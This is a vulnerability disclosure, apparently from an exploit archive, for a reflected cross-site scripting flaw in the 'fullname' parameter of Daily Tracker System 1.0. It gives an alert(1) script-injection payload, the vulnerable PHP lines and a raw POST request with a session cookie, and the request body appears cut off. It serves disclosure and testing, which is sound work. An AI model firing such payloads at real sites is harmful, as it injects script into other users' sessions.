Daily Tracker System 1.0 Cross Site Scripting

Daily Tracker System version 1.0 suffers from a cross site scripting vulnerability.

MD5 | f76f9f2e802b07ba734d6ceff8f28a90

# Exploit Title: Daily Tracker System v1.0 - Reflected Cross Site Scripting
# Exploit Author: Adeeb Shah
# Date: July 30th, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link:
# Version: v1.0
# Tested On: Windows 10 Pro (x64) + XAMPP

# Vulnerability Details:
# The value of the fullname request parameter is copied into the value of
an HTML tag attribute which is encapsulated in double quotation marks. The
payload rwsg6"><script>alert(1)</script>x88n2 was submitted in the fullname
parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject
arbitrary JavaScript into the application's response.

# Vulnerable Source Code
# ./user-profile.php
# 11 $fullname=$_POST['fullname'];
# ./includes/sidebar.php
# 21 <div class="profile-usertitle-name"><?php echo $name;
# POST /dets/user-profile.php HTTP/1.1

Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Cookie: PHPSESSID=atvmfd664osgggvtcoc4scv9vs

[email protected]

Related Posts